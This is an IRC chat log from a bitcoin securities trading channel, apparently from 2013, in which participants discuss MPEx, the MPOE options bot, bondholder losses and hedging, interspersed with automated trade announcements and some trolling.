15:48:39 i use all of them Mar 30 15:48:49 coinbr us actually a window into mpex Mar 30 15:48:57 with lower more spread out fees Mar 30 15:49:55 [BTCTC] [B.YABMC] 1 @ 0.007701 BTC [-] Mar 30 15:50:37 really? sounds interesting Mar 30 15:50:42 so coiner is the best? Mar 30 15:52:04 there is no best Mar 30 15:52:16 but coinbr is the most affordable way to do mpex Mar 30 15:52:34 unless you are a big player Mar 30 15:52:39 so the others have fees as well? Mar 30 15:52:51 no hard fees Mar 30 15:52:57 only transactional fees Mar 30 15:53:02 which all exchanges have Mar 30 15:53:19 yea Mar 30 15:55:48 [MPEX] [S.MPOE] 2050 @ 0.00067955 = 1.3931 BTC [+] Mar 30 16:03:03 [HAVELOCK] [VTX] 1 @ 0.4999 BTC [+] Mar 30 16:09:36 wtb 5000+ SDICE pm if you have fair price (below current market asks) Mar 30 16:18:52 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [-] Mar 30 16:19:37 [BTCTC] [GSDPT] 1 @ 0.0041 BTC [+] Mar 30 16:20:12 [BTCTC] [GSDPT] 399 @ 0.0041 = 1.6359 BTC [+] Mar 30 16:20:48 question: MPEX support a socket based implementation for requesting trades from a certain seq number forward. Why isn't there something like that for quotes? Mar 30 16:23:03 [HAVELOCK] [SDICE] 1 @ 0.41499999 BTC [+] Mar 30 16:37:15 ThickAsThieves why not just put a bid ? Mar 30 16:43:37 [BTCTC] [GSDPT] 25 @ 0.00409 = 0.1023 BTC [-] Mar 30 17:01:43 hm, maybe there wont be a big second downmove from here Mar 30 17:04:05 i have bids up, was just fishing to see if there were any sellers inside the spread that dont have asks up Mar 30 17:04:54 it's all in bugpowder's pocket probly Mar 30 17:05:02 Jesus Mar 30 17:05:40 The market making not Mar 30 17:05:43 Not Mar 30 17:05:48 Bot Mar 30 17:05:57 Yes Mar 30 17:06:31 Historically it averages 12% return on notional exposure a month Mar 30 17:06:45 But the variance is... High. Mar 30 17:07:06 ihave to imagine the bot algo has been tightened, or? Mar 30 17:07:33 It does do explicit hedging Mar 30 17:07:43 Mostly mircera Mar 30 17:08:22 It's all in the financial statement Mar 30 17:08:28 Read it Mar 30 17:09:05 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [-] Mar 30 17:09:08 STOP Mar 30 17:09:35 fucking idiot Mar 30 17:10:08 [HAVELOCK] [SDICE] 1 @ 0.39999999 BTC [-] Mar 30 17:10:16 +b PsychoticBoy Mar 30 17:10:22 ^ Mar 30 17:10:26 ^ Mar 30 17:10:47 This was always possible, very clearly so Mar 30 17:10:48 you dont have the right to spam Mar 30 17:11:01 just ask your questions cleanly Mar 30 17:11:04 and wait for answers Mar 30 17:11:05 [HAVELOCK] [SDICE] 1 @ 0.4 BTC [+] Mar 30 17:11:07 Based on August results Mar 30 17:11:13 [BTCTC] [PAJKA.BOND] 7 @ 0.106 = 0.742 BTC [+] Mar 30 17:11:32 There's no doubt that this is self aggrandizing trolling. If what you are saying is the truth or not you're trying to make yourself the center of attention. Knock it off. Mar 30 17:11:50 Actual losses of principal were 19k of which mircrea provided 75% of Mar 30 17:12:40 Ya, just wanted to pass into. Like everything you've said about it and how your opinion matters so much. Don't flood. Mar 30 17:12:50 That is not true Mar 30 17:12:53 Look at past statements Mar 30 17:13:04 my only question is, has the bot algo been adjusted to mitigate this exposure in the future Mar 30 17:13:23 Mpex is a sideshow Mar 30 17:13:25 or is this just how it is Mar 30 17:13:31 Mpoe is the real profit engine Mar 30 17:14:45 Pycho, you only lost a few hundred bux Mar 30 17:14:51 cheap lesson Mar 30 17:15:25 Well considering the max bond exposure is always less than the total capital, indefinitely. Mar 30 17:15:48 Although the bot liquidity might go bye bye Mar 30 17:16:07 i lost some too Mar 30 17:16:11 i blame me Mar 30 17:16:54 I wish I had all the gains. Mar 30 17:17:05 [HAVELOCK] [SDICE] 4 @ 0.4 = 1.6 BTC [+] Mar 30 17:17:14 but if MP lost that much covering the bonds, I'd like to hear if changes have been made to mitigate Mar 30 17:17:15 Yeah, extremely well Mar 30 17:17:35 Bug who are you talking to, i must have them on ignore Mar 30 17:17:41 Lol Mar 30 17:18:43 Anyway, if you dont understand the risks of being a bond holder, you should probably go back to the gloves kiddy pool Mar 30 17:18:54 Glbse Mar 30 17:19:27 [BTCTC] [GSDPT] 9 @ 0.00409 = 0.0368 BTC [-] Mar 30 17:19:49 unignoring tiberius :( Mar 30 17:20:03 ola Mar 30 17:20:45 Anyway, have a wonderful weekend. Mar 30 17:22:11 Because he didn't understand the real risks Mar 30 17:22:25 MPs losses are a small portion of his assets, but I have to assume he will asjust exposure of the bot after this, no? Mar 30 17:23:02 Mpoe bonds never seemed like a good value prop To me. Mar 30 17:23:08 what does sdice have to do with this Mar 30 17:23:17 Sdice has made Mar 30 17:23:18 70k Mar 30 17:23:30 so Mar 30 17:23:50 i thought you were chiding MP, not Erik Mar 30 17:24:40 right, so rather than litter this chan with bitching, I'm just asking what I think is a sensible question, Mar 30 17:24:51 will he protect the bot better Mar 30 17:25:14 my only question is, has the bot algo been adjusted to mitigate this exposure in the future << no. Mar 30 17:25:23 bot hasn't been altered fundamentally since 2011 Mar 30 17:25:30 thank you Mar 30 17:25:58 I'm sure u could tweak the ago Mar 30 17:26:00 MP, so you'll continue to take on the majority liability of the bot? Mar 30 17:26:03 Ago Mar 30 17:26:05 Algo Mar 30 17:26:10 Bugpowder the issue is that people make assumption based on the algo as is Mar 30 17:26:16 any tweak is fundamentally market intervention Mar 30 17:26:24 the correct fix is for bond ppl to set appropriatge interests Mar 30 17:26:33 not for me to dick around in the fabric of the universe. Mar 30 17:26:46 but the sustainability of your setup is in danger if price continues to move violently Mar 30 17:26:47 ThickAsThieves i've always backstopped the bot, since day one. Mar 30 17:26:54 if not enough bonds sell i'm covering. Mar 30 17:27:40 lol Mar 30 17:27:53 i'm about to put you two back on ignore fml Mar 30 17:28:09 Psycho, tib, grow up plz Mar 30 17:28:13 Bugpowder anyway, the variance would be fucking high. +400% a month fml. Mar 30 17:28:25 Yah Mar 30 17:28:27 Why is the whole internet a troll magnet? Be respectful, please. Mar 30 17:28:49 http://www.youtube.com/embed/LJP1DphOWPs << this guy... Mar 30 17:29:04 And for me, if I don't see what I consider to be mispriced options, I'm not going to buy them Mar 30 17:29:12 Just don't be rude about it. There's no reason to be a jerk. Mar 30 17:29:26 no, THIS guy http://www.youtube.com/watch?v=bTwQXpGtTyE Mar 30 17:29:49 Where is the fraud here? Mar 30 17:29:53 Cool, say it once and be done. Mar 30 17:30:07 Not seeing it. I'm seeing clear contracts traded and honored Mar 30 17:30:08 can't we all just be freinds Mar 30 17:30:49 i dont see any fraud either Mar 30 17:31:02 What about covered exposure are you pretending you don't understand? Mar 30 17:31:19 I personally don't know and don't hold any of this asset. But I'm being prevented from listening to any intelligent talk about the issue by trolling.Wether you think you are justified or not. Mar 30 17:31:27 You are clearly Mar 30 17:31:39 [MPEX] [O.USD.C092T] 575 @ 0.24943748 = 143.4266 BTC [+] Mar 30 17:31:46 Heheh Mar 30 17:31:50 More options!!! Mar 30 17:31:53 Moar Mar 30 17:32:11 fucking hell am i going to be paying .6 btc worth 200 each on these ? Mar 30 17:32:38 i tell you, running the options book is the worst fucking racket there is. when you get no trade you're depressed, when you do get trade you're worried. Mar 30 17:33:15 Oh lord. +b tiberiusiv He's just repeating himself over and over. Mar 30 17:33:26 It's a slow flood. Mar 30 17:33:34 OneMiner prolly ignore works better than banning people. Mar 30 17:33:43 *sigh* Mar 30 17:34:04 Ignore is confusing. Can't tell who is talking to who. Mar 30 17:34:09 this is true. Mar 30 17:34:26 ignore doesnt work when people keep feeding the troll Mar 30 17:34:34 it DOES make unignored people look like muppets when they're in effect talking to themselves lol Mar 30 17:34:48 tib has been polluting this channel all week Mar 30 17:34:53 Ciuciu is back! I thought he was gone after robbing everyone Mar 30 17:35:00 and was already banned once Mar 30 17:35:07 Bugpowder girl said he was there to warn everyone about her shirt Mar 30 17:36:22 quit with the gypsy shit Mar 30 17:37:16 !ticker m S.MPOE Mar 30 17:37:19 [MPEX:S.MPOE] 1D: 0.00066393 / 0.00067378 / 0.00068314 (591559 shares, 398.58 BTC), 7D: 0.0006 / 0.00066121 / 0.00071369 (2268750 shares, 1,500.12 BTC), 30D: 0.0006 / 0.00073136 / 0.00078628 (17700228 shares, 12,945.38 BTC) Mar 30 17:37:25 oh nice Mar 30 17:37:32 wait it went up ? Mar 30 17:37:50 Up Pre report Mar 30 17:37:54 yea Mar 30 17:38:01 [MPEX] [O.USD.C089T] 120 @ 0.26539875 = 31.8479 BTC Mar 30 17:38:03 Not much action since? Mar 30 17:38:18 kinda incredible Mar 30 17:38:45 there is a 29k loss for bondholders, maybe bondholders aren't mpoe holders Mar 30 17:38:52 then again... i guess i can see it. shareholders don't care, not their skin. made a 39 per which is not really much lower than usual Mar 30 17:39:19 thestrin1puller they are lol. i hold most of mpoe and held most of the bond book >.< Mar 30 17:39:33 mircea_popescu: what's the plan to bring MPOE bot to MPOE bot 2.0 Mar 30 17:39:39 how are bonds purchased, other than thrue the coinbr bitfunder assets? Mar 30 17:40:01 through* Mar 30 17:40:18 ThickAsThieves you send no less than 100 btc to 1JPvucRfu3ZzEvfBUQTJwsxMrZjeTqD6zR ending in 888 (so like 100.00000888) after you've emailed me stating your beneficiary addy and desired % Mar 30 17:40:37 thestrin1puller what'd 2.0 be like ? Mar 30 17:40:52 dunno, seems the bot has trouble with times of extreme volatility Mar 30 17:41:03 except for Feb Mar 30 17:41:08 listen, there's no way to make a bot so you always win. Mar 30 17:41:19 sometimes you'll take a beating. Mar 30 17:41:44 sensible, but it seems odd to be THAT exposed in the algo Mar 30 17:42:00 but this is what it does. mpoe bot is in the market of buying exposure. Mar 30 17:42:09 so other people can sell their exposure and increase their safety. Mar 30 17:42:15 for this service it charges. Mar 30 17:42:22 or pays Mar 30 17:42:24 :) Mar 30 17:42:25 it's sort of like insurance, if you will. you pay a little every month Mar 30 17:42:32 when a hurricane hits the insurer pays through the teeth. Mar 30 17:42:37 how do bondholers then hedge their risk? Mar 30 17:42:44 bondholders* Mar 30 17:42:53 buying options Mar 30 17:42:59 thestrin1puller well they don't really. the idea is they're taking on risk for a high % Mar 30 17:43:23 mpoe-bonds are pretty much the highest reward / highest risk actgion in btc. Mar 30 17:43:28 by a wide margin, with a lot of depth etc. Mar 30 17:43:54 the history of gained % seems a bit disproportionate to the risk Mar 30 17:44:11 if that's true then bondholders have been mispricing their % Mar 30 17:44:29 you are learget bondholder Mar 30 17:44:35 largest* Mar 30 17:44:40 as a last resort though Mar 30 17:44:41 right? Mar 30 17:44:46 i see Mar 30 17:44:49 well ya on this month. i rarely participate in the actual market. Mar 30 17:44:56 as in, i don't set a %, i just take whatever the max was Mar 30 17:45:02 question: wtf do gypsies have to do with all of this? Mar 30 17:45:08 ... Mar 30 17:45:15 thats not a question Mar 30 17:45:17 its a troll Mar 30 17:46:09 WTS GSDPT shares and BTCQuick shares :) Mar 30 17:46:17 mircea_popescu: why not create a war chest? For times like thse. Mar 30 17:46:19 these* Mar 30 17:46:24 what's a warchest ? Mar 30 17:47:37 a reserve Mar 30 17:47:59 is it unnecessary or what...? Mar 30 17:48:11 well, imo it would just muddy the waters. Mar 30 17:48:11 http://www.foxnews.com/tech/2013/03/29/digital-currency-bitcoin-surpasses-20-national-currencies-in-value/ - lol fox news Mar 30 17:48:19 atm mpoe is a 0 capital venture, which is a good thing. Mar 30 17:48:50 [MPEX] [S.MPOE] 9014 @ 0.00067281 = 6.0647 BTC [-] Mar 30 17:48:53 I've used the same model for some of my real life ventures, it's a very good model in that you view capital as "equipment" Mar 30 17:49:05 [HAVELOCK] [VTX] 10 @ 0.48 = 4.8 BTC [-] Mar 30 17:49:06 [HAVELOCK] [VTX] 6 @ 0.4994 = 2.9964 BTC [+] Mar 30 17:49:07 [HAVELOCK] [VTX] 12 @ 0.4995 = 5.994 BTC [+] Mar 30 17:49:08 [HAVELOCK] [VTX] 72 @ 0.4999 = 35.9928 BTC [+] Mar 30 17:49:18 however it's the riskiness involved in "borrowing" the capital (can it be paid back /w interest) Mar 30 17:50:56 the trolling potential of this channel is quite high. how could I miss this Mar 30 17:51:05 [HAVELOCK] [SDICE] 1 @ 0.41499998 BTC [+] Mar 30 17:53:03 [HAVELOCK] [SDICE] 1 @ 0.41499999 BTC [+] Mar 30 17:53:07 trolls with no money have no purpose :P Mar 30 17:53:10 !ticker h HIM Mar 30 17:53:12 [HAVELOCK:HIM] 1D: 1.88000000 / 1.89 / 1.89500000 (3 shares, 5.67000000 BTC), 7D: 1.41000000 / 1.72614891 / 2.00000000 (182 shares, 314.15910103 BTC), 30D: 1.40000000 / 1.82208764 / 17.25000000 (716 shares, 1304.61475269 BTC) Mar 30 17:56:17 I guess I can now go to my grave having contributed ~15k BTC of my own to the stabilisation of BTC <- was that big push you yesterday? :> Mar 30 17:57:23 Mpex is a sideshow <<< if it weren't for mpex there'd have been no divs this month at all. Mar 30 17:57:49 In terms of the main profit engine Mar 30 17:58:12 Mpoe has provided most of the returns and volatility Mar 30 17:58:26 Mpex is a steady stream Mar 30 17:59:05 [HAVELOCK] [HIM] 5 @ 1.93 = 9.65 BTC [+] Mar 30 17:59:57 yeah Mar 30 18:00:04 just like a successful marriage. Mar 30 18:00:15 mpex makes sure there's warm server soup on the table. Mar 30 18:00:47 isn't that what the help is for? Mar 30 18:01:05 [HAVELOCK] [KCIM] 1 @ 1.198 BTC [+] Mar 30 18:01:58 taub how you mean ? Mar 30 18:04:06 [HAVELOCK] [SDICE] 2 @ 0.41499998 = 0.83 BTC [-] Mar 30 18:05:05 [HAVELOCK] [SDICE] 4 @ 0.41499998 = 1.66 BTC [-] Mar 30 18:10:03 [BTCTC] [BASIC-MINING] 24 @ 0.37 = 8.88 BTC [+] Mar 30 18:10:31 yesterday on mygox there suddenly was 15k on the bid Mar 30 18:10:37 [BTCTC] [ASICMINER-PT] 1 @ 0.7701 BTC [-] Mar 30 18:10:40 [BTCTC] [ASICMINER-PT] 2 @ 0.7701 = 1.5402 BTC [-] Mar 30 18:10:43 [BTCTC] [ASICMINER-PT] 2 @ 0.77 = 1.54 BTC [-] Mar 30 18:10:45 [BTCTC] [ASICMINER-PT] 1 @ 0.7653 BTC [-] Mar 30 18:10:47 [BTCTC] [ASICMINER-PT] 6 @ 0.7605 = 4.563 BTC [-] Mar 30 18:10:51 [BTCTC] [ASICMINER-PT] 8 @ 0.7603 = 6.0824 BTC [-] Mar 30 18:10:58 nah, that was about the options coverage. Mar 30 18:11:02 [BTCTC] [ASICMINER-PT] 10 @ 0.7602 = 7.602 BTC [-] Mar 30 18:11:04 [BTCTC] [ASICMINER-PT] 2 @ 0.75 = 1.5 BTC [-] Mar 30 18:11:07 [BTCTC] [ASICMINER-PT] 6 @ 0.75 = 4.5 BTC [-] Mar 30 18:11:09 [BTCTC] [ASICMINER-PT] 4 @ 0.75 = 3 BTC [-] Mar 30 18:11:15 [BTCTC] [ASICMINER-PT] 38 @ 0.74 = 28.12 BTC [-] Mar 30 18:11:27 [BTCTC] [BASIC-MINING] 5 @ 0.38 = 1.9 BTC [+] Mar 30 18:12:05 [HAVELOCK] [KCIM] 1 @ 1.1999 BTC [+] Mar 30 18:13:05 [HAVELOCK] [SDICE] 1 @ 0.41499998 BTC [-] Mar 30 18:14:00 [BTCTC] [GSDPT] 48 @ 0.00409 = 0.1963 BTC [-] Mar 30 18:14:03 but mpex either needs more horrible traders Mar 30 18:14:14 or you could start hedging your options Mar 30 18:14:35 to bring down that big variance... Mar 30 18:14:44 you're basically operating a bucket shop Mar 30 18:14:58 but not enough suckers Mar 30 18:15:05 who lose on their options Mar 30 18:16:26 i don't follow your logic. Mar 30 18:16:32 how is it a bucket shop ? Mar 30 18:17:04 because you take the other side of each trade, if traders only win against you then you lose money Mar 30 18:17:18 that;'s not what a bucket shop is. Mar 30 18:17:46 in forex i thought it was, a broker taht assumes most of their customers are gonna lose money Mar 30 18:17:47 but anyway : mpoe can't hedge. what it does is it allows others to hedge against it. Mar 30 18:17:53 let me find you the relevant article. Mar 30 18:18:23 http://mpex.co/faq.html#27 and next 2 Mar 30 18:19:13 would you elaborate on what a bucket shop is and why MPEx is not that? Mar 30 18:19:32 the exchange i solid Mar 30 18:19:38 the option bot is the worrysome part Mar 30 18:19:48 *is solid Mar 30 18:20:09 i also do not understand the option bot's behavior. Mar 30 18:20:24 mircea_popescu: if the underlying volume and depth cant support your options you shouldnt be offering them like that maybe ;) Mar 30 18:20:36 lol all the hate. inbetween, coinbr got possibly most deposits in one day in few hrs i was afk Mar 30 18:20:38 or its role. mircea_popescu, would you elaborate on the bot's role? Mar 30 18:20:43 this month Mar 30 18:20:46 ok let's see. Mar 30 18:20:54 they will be processed shortly Mar 30 18:21:05 [HAVELOCK] [VTX] 20 @ 0.4999 = 9.998 BTC [+] Mar 30 18:21:07 a bucket shop is a currently illegal, historically popular venue to take side bets on stocks. Mar 30 18:21:12 as well as mpoe dividend Mar 30 18:21:32 the operator would offer very high margin and trade with low net worth parties who couldn't participate in the real marketsd. Mar 30 18:22:16 mpex does offer stocks, but that's not under discussion here. as for the derivative trade, ie options, these are a different market from the underlying. Mar 30 18:22:22 most forex brokers still operate like that Mar 30 18:22:32 so does that clarify the difference ? Mar 30 18:23:09 yes, that makes sense. and the bot? Mar 30 18:23:24 okay. the bot itself is a primary seller of safety in btc. Mar 30 18:23:49 [MPEX] [S.MPOE] 10143 @ 0.00067879 = 6.885 BTC [+] Mar 30 18:23:52 I don't understand the phrase "seller of safety in btc". Mar 30 18:23:59 this is what it does. if i go buy safety somewhere else then i'm no longer PROVIDING it Mar 30 18:24:02 i'm just flipping it. Mar 30 18:24:04 [HAVELOCK] [SDICE] 1 @ 0.41499999 BTC [+] Mar 30 18:24:16 benkay take the insurance example, because it is really very apt. Mar 30 18:24:24 if there's a flood plain and farmers work that plain, Mar 30 18:24:31 it would be beneficial for them to buy flood insurance. Mar 30 18:24:45 the only way to actually underwrite this is to have a lot of money, sign insurance policies with the farmers. Mar 30 18:24:46 i dont think thats how real option issuer work tho Mar 30 18:24:49 when floods hit you pay. Mar 30 18:24:49 you got the cpital Mar 30 18:24:55 why not hedge Mar 30 18:25:10 the alternative would be to simply re-buy insurance somewhere else. but this isn't underwriting, this is simply trading. Mar 30 18:25:23 i'm not trading volatility, i'm actually providing the hedge endpoint. Mar 30 18:25:42 or if you prefer the example of the internet : second, third and higher tier providers BUY bandwidth. Mar 30 18:25:51 but the 1st level providers don't buy it, cause there's nobody to buy it from Mar 30 18:25:53 they just swap it. Mar 30 18:26:01 or in other words "create" it. Mar 30 18:26:39 taub cause there's nobody to hedge against. Mar 30 18:27:05 the moment i go in the market to hedge i'm basically releasing all the risk out there. this isn't waht mpoe does. mpoe just soaks up the risk. Mar 30 18:27:05 doesn't i say that in your faq? Mar 30 18:27:30 http://mpex.co/faq.html#27 http://mpex.co/faq.html#28 Mar 30 18:27:31 thanks mp, i understand the mechanism a little better now. what I still don't understand is what the MPOE bot is up to. Mar 30 18:27:49 "You can't pull yourself up by your breeches and for the very same reason you can't have everybody in the market hedge. Someone needs to provide the support everyone else relies on to hedge. I'm that someone." - MP Mar 30 18:28:16 we are engaging in a discussion of this topic, yes Mar 30 18:28:24 benkay up to as in how you mean ? Mar 30 18:28:35 no as in like wtf is it actually doing Mar 30 18:28:56 it makes bids and asks for the options. Mar 30 18:29:24 how does it decide where to place its bids? Mar 30 18:29:34 that's proprietary. it has an algo. Mar 30 18:29:52 so it behaves as just another trader? Mar 30 18:29:59 pretty much yea Mar 30 18:30:28 providing liquidity to the market? Mar 30 18:30:29 why isn't the bot quoting right now? Mar 30 18:30:44 thestrin1puller isnt it ? Mar 30 18:30:49 benkay yep Mar 30 18:31:21 nvm it's back up Mar 30 18:31:24 site was lying to me Mar 30 18:31:41 !ticker m ^OIX Mar 30 18:31:42 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 55.14018691 / 85.06423935 / 85.06556611 (111010 shares, 22,104.19 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 30 18:31:55 oix is fucked because of the mpsic change Mar 30 18:32:00 oh Mar 30 18:32:01 it will make sense again in about a week. Mar 30 18:32:23 they are binary options yea? dont think i quite understand their pricing from 0 to 1 Mar 30 18:32:24 all the way up to 200 I see :) Mar 30 18:32:35 taub not binary. american style btc settled. Mar 30 18:32:46 thestrin1puller ya, there's a notice. Mar 30 18:33:44 what exchange-proprietary information does the bot get access to? Mar 30 18:33:50 none. Mar 30 18:33:56 obviously you have to say that. Mar 30 18:33:59 all it sees is the btc/usd history Mar 30 18:34:07 which is public Mar 30 18:34:31 am I the only one who feels bad for this month's bond holders? Mar 30 18:34:34 thanks mp for the service you provide; Mar 30 18:34:45 mircea_popescu: exercises are not public Mar 30 18:34:50 bitesak i'd normally say my pleasure... but this month was a little rough. Mar 30 18:35:08 jurov the bot doesn't see exercises tho Mar 30 18:35:17 thestrin1puller no, i feel bad for them too. Mar 30 18:35:30 I guess we can't always have months like Jan Mar 30 18:35:43 do you adjust the algo going forward to take into consideration what causes big losses? Mar 30 18:35:49 nope. Mar 30 18:36:23 no replies on btctalk so far... but we'll see when ppl come to bitfunder to receive only 0.081 pre share Mar 30 18:36:38 jurov scam Mar 30 18:36:56 what was the % loss for the PT jurov ? Mar 30 18:37:01 40? Mar 30 18:37:11 wat? Mar 30 18:37:22 like 25% i'd expect Mar 30 18:37:23 it's 1:1 to MPOE Mar 30 18:37:27 23 Mar 30 18:37:31 yes Mar 30 18:37:33 "All complaints of bondholder loss should be directed to Bugpowder who now holds your money" Mar 30 18:37:38 ahahaha Mar 30 18:37:49 :D Mar 30 18:37:54 heh, i made some myself, tooo Mar 30 18:38:00 do you even know that ? lol Mar 30 18:38:03 maybe he's just talkin'. Mar 30 18:38:24 poor guy lol. one day he's claiming market success like what... 99% of all internet ppl in financial rooms Mar 30 18:38:30 the next they ANGRY MOB WITH PITCHFORKS Mar 30 18:39:17 Maybe he'll start a company to benefit bitcoin (yay optimism LOL) Mar 30 18:40:30 he;'ll benefit tesla motors Mar 30 18:40:37 tiberiusiv: option writers make the most money when there is no volatility in the underlying security Mar 30 18:41:05 so overtime MPOE will be profitable to bondholers Mar 30 18:41:05 [HAVELOCK] [SDICE] 3 @ 0.41499998 = 1.245 BTC [-] Mar 30 18:41:14 !ticker m S.DICE Mar 30 18:41:16 [MPEX:S.DICE] 1D: 0.00337335 / 0.00368422 / 0.0039999 (14099 shares, 51.94 BTC), 7D: 0.0031 / 0.00338624 / 0.0045 (675573 shares, 2,287.66 BTC), 30D: 0.00300001 / 0.00449093 / 0.00637777 (1675373 shares, 7,524.00 BTC) Mar 30 18:41:40 thestrin1puller: he knows everything, no need to explain anything to him. and ofc, thars NO LIQUIDITY Mar 30 18:41:51 NO POK Mar 30 18:42:06 at all ?! Mar 30 18:42:26 Not sure if tiberiusiv is serious, or just trolling. Mar 30 18:42:57 Up until this month MPOE bonds were profitable long term (all profits + all losses > 0) Mar 30 18:43:29 tiberiusiv: ofc, if mp goes out of money he stops sellin options. happened before already Mar 30 18:43:54 I know they are, this month they are, just like an insurance company loses money during a natural disaster... Mar 30 18:44:28 tiberiusiv: those who profited by buying calls see the credibility soar :) Mar 30 18:44:48 insurance companies also have reserves they invest to hedge that risk... Mar 30 18:45:05 that's not up to mircea_popescu it's up to his bondholders Mar 30 18:45:09 i feel like you aren't listening Mar 30 18:45:23 insurance companies make losses all the time... Mar 30 18:46:16 that's an expansive claim. Mar 30 18:46:32 this is where he lists of AIG among others Mar 30 18:46:36 BOOYA Mar 30 18:46:41 I'm so predictive Mar 30 18:46:53 no he's not Mar 30 18:46:58 you keep saying that like it's fact Mar 30 18:47:01 this is one exception! Mar 30 18:47:08 1 month != all months Mar 30 18:47:19 what sheet, tiberiusiv? Mar 30 18:47:21 That made me LOL Mar 30 18:48:01 tiberiusiv: there's mircea's private activities like MPHF Mar 30 18:48:15 mphf? Mar 30 18:48:24 = shorting GLBSEsque assets Mar 30 18:48:50 tiberiusiv: why are you making claims with out evidence Mar 30 18:49:26 mircea_popescu: are ALL your financials public knowledge? lets clear this up Mar 30 18:49:58 thestrin1puller no. i paid twennyfive dollars for a girls pair of stockings out of pocket yesterday. Mar 30 18:50:04 what do you mean "all your financials" ?! Mar 30 18:50:32 lol Mar 30 18:50:56 one could ask Mar 30 18:50:58 hey mircea Mar 30 18:51:13 how many months of 15k losses can MPEx/Mircea Popescu sustain? Mar 30 18:51:13 mircea_popescu: it seems tiberiusiv knows your financials because they are all public Mar 30 18:51:21 um Mar 30 18:51:30 thestrin1puller i told ya, he knows everything Mar 30 18:51:32 do you mean polimedia srl ? Mar 30 18:51:58 i suppose. does polimedia srl's corporate structure provide for funding MPEx? Mar 30 18:52:02 nope. Mar 30 18:52:15 it's a romanian-based llc (srl in romanian) that i own ~99% of Mar 30 18:52:32 then, how many months of 15kbtc losses can the exchange sustain? Mar 30 18:52:49 at least a year. Mar 30 18:53:04 mircea_popescu you make a bunch of people rich this month, and people still complain... Mar 30 18:53:23 thestrin1puller ya well, the thing is this : mpoe and mpex are VERY complex, well thought out intricately designed gems. Mar 30 18:53:32 "people" have been busily ignoring it for the past year or two Mar 30 18:53:38 meanwhile it's been taking over. Mar 30 18:53:54 now "people" are confronted with the rude awakening of reality. kinda bound to be a little thrashing about. Mar 30 18:54:02 ;;bc,24hprc Mar 30 18:54:03 Error: "bc,24hprc" is not a valid command. Mar 30 18:54:12 [BTCTC] [ASICMINER-PT] 4 @ 0.792 = 3.168 BTC [+] Mar 30 18:54:13 ;;ticker Mar 30 18:54:14 BTCUSD ticker | Best bid: 90.49001, Best ask: 90.50000, Bid-ask spread: 0.00999, Last trade: 90.50000, 24 hour volume: 51005.98011536, 24 hour low: 85.50000, 24 hour high: 94.98000, 24 hour vwap: 90.64316 Mar 30 18:54:29 Roumania is taking Europe over__ Mar 30 18:54:35 ooh. what's the difference between MPOE and MPEx? Mar 30 18:54:49 MPOE is the options trades, MPEx is the exchange Mar 30 18:54:54 Hmm. mircea_popescu could one externally hedge risks of being a bondholder with other investments no? Mar 30 18:55:04 [HAVELOCK] [KCIM] 7 @ 1.198 = 8.386 BTC [-] Mar 30 18:55:11 thestrin1puller hedge them by buying options :D Mar 30 18:55:21 thestrin1puller like how ? Mar 30 18:56:06 bitesak lol considering the state of finances everywhere in europe vs romania... that's not quite so far off. Mar 30 18:56:22 mircea_popescu: for instance I put x BTC in Bonds during a bad month, but some other investment say, S.DICE growth, effectively neutralizes my bond losses Mar 30 18:56:31 yeah, but these aren't related Mar 30 18:56:42 i know but I'm saying diversification is one solution no? Mar 30 18:56:44 to hedge you would need things which for good reason move in opposing directions. Mar 30 18:56:52 diversification certainly is a solution, yes. Mar 30 18:56:56 thestrin1puller: BTC growth itself effectively neutralized your bond losses, don't forget Mar 30 18:57:03 if you have 105 btc and put 100 btc into mpoe bonds expect a wild ride. Mar 30 18:57:22 jurov that is a point, in fiat terms the bondholders made money :D Mar 30 18:57:48 actually... this is interesting. from a purely fiat perspective mpoe bonds may be one of the best btc-investments you can make. Mar 30 18:58:04 unless you have an august month Mar 30 18:58:06 I have been saying that for sometime in Switzerland :) Mar 30 18:58:07 That was just... Mar 30 18:58:15 August was terrible Mar 30 18:59:18 yeah. Mar 30 19:00:17 tiberiusiv, you forget there's someone who actually sees your portfolio and call you on your BS Mar 30 19:01:20 and sdice? Mar 30 19:02:08 thestrin1puller thinking more about your question : it would seem to me there is some relation here: Mar 30 19:02:25 MPOE bonds make money on calm fx market, lose money on volatility. Mar 30 19:03:03 places like mtgox make money on volatility Mar 30 19:03:11 [MPEX] [S.DICE] 1750 @ 0.0039999 = 6.9998 BTC [+] Mar 30 19:03:17 so maybe the best play is a weighted binary portofolio, bonds and mtgox shares Mar 30 19:03:27 it's moot practically as they're not listed, but since we're discussing theory. Mar 30 19:03:29 and options Mar 30 19:03:43 jurov yeah, you could be trading options too Mar 30 19:03:54 mtgox makes money on volume, not volatility Mar 30 19:04:01 taub those'd be related tho Mar 30 19:04:21 they dont have to Mar 30 19:04:25 also true Mar 30 19:04:47 tiberiusiv, i actually did it once when everyone was like "half reward is coming, brace ur" Mar 30 19:05:00 i did a split, sold both puts and calls Mar 30 19:05:11 and indeed nothing happened then Mar 30 19:05:14 lol Mar 30 19:05:24 but won't dare to repeat it Mar 30 19:05:34 mp, obv you should be hedging using litecoin Mar 30 19:05:35 :) Mar 30 19:05:38 who was pirate Mar 30 19:05:40 i guess btc is still very much a contrarian market. whatever the public consensus is, it's prolly wrong. Mar 30 19:05:57 taub http://trilema.com/2012/the-bitcoin-drama-timeline/ Mar 30 19:06:10 good start point for the history of btc financials. Mar 30 19:06:22 (not implying pirate was such a thing) Mar 30 19:07:15 hey, who here was from slovenia ? Mar 30 19:07:30 that kakobrekla fella Mar 30 19:07:46 kakobrekla what's it like there ? i can't make sense of all the bs i'm reading. Mar 30 19:08:07 about what Mar 30 19:08:34 about impending doom Mar 30 19:08:48 fyi italy is in yurop and you worry bout slovenia? Mar 30 19:08:58 slovenia to sunk into adriatic, austrians want some coastline :D Mar 30 19:09:06 is maribor going under ? Mar 30 19:09:20 i dont think so Mar 30 19:10:05 S.DICE should be skyrocketing Mar 30 19:10:12 !ticker m S.DICE Mar 30 19:10:13 [MPEX:S.DICE] 1D: 0.00337335 / 0.00371908 / 0.0039999 (15849 shares, 58.94 BTC), 7D: 0.0031 / 0.00338783 / 0.0045 (677323 shares, 2,294.66 BTC), 30D: 0.00300001 / 0.00449042 / 0.00637777 (1677123 shares, 7,531.00 BTC) Mar 30 19:10:29 why again? Mar 30 19:10:45 Based on the rise in 